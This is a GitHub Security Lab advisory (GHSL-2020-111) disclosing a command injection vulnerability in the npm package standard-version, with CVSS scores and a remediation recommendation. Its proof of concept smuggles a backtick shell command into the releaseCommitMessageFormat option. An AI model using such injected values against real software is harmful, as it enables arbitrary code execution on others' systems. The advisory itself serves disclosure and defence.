10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
82.2%
GHSL-2020-111
The GitHub Security Lab team has identified a potential security vulnerability in standard-version.
The standardVersion
function has a command injection vulnerability. Clients of the standard-version
library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
Standard Version
Commit 2f04ac8
standardVersion
The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:
npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"
Now create a file with the following contents:
var fs = require("fs");
// setting up a bit of environment
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');
const standardVersion = require('standard-version')
standardVersion({
noVerify: true,
infile: 'foo.txt',
releaseCommitMessageFormat: "bla `touch exploit`"
})
and run it:
node test.js
Notice that a file named exploit
has been created.
This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples:
CVE-2020-7646,
CVE-2020-7614,
CVE-2020-7597,
CVE-2019-10778,
CVE-2019-10776,
CVE-2018-16462,
CVE-2018-16461,
CVE-2018-16460,
CVE-2018-13797,
CVE-2018-3786,
CVE-2018-3772,
CVE-2018-3746,
CVE-2017-16100,
CVE-2017-16042.
We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version
project here.
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile
instead of child_process.exec
.
This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).
You can contact the GHSL team at [email protected]
, please include GHSL-2020-111
in any communication regarding this issue.
This report is subject to our coordinated disclosure policy.
CPE | Name | Operator | Version |
---|---|---|---|
standard-version | lt | 8.0.1 |
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
82.2%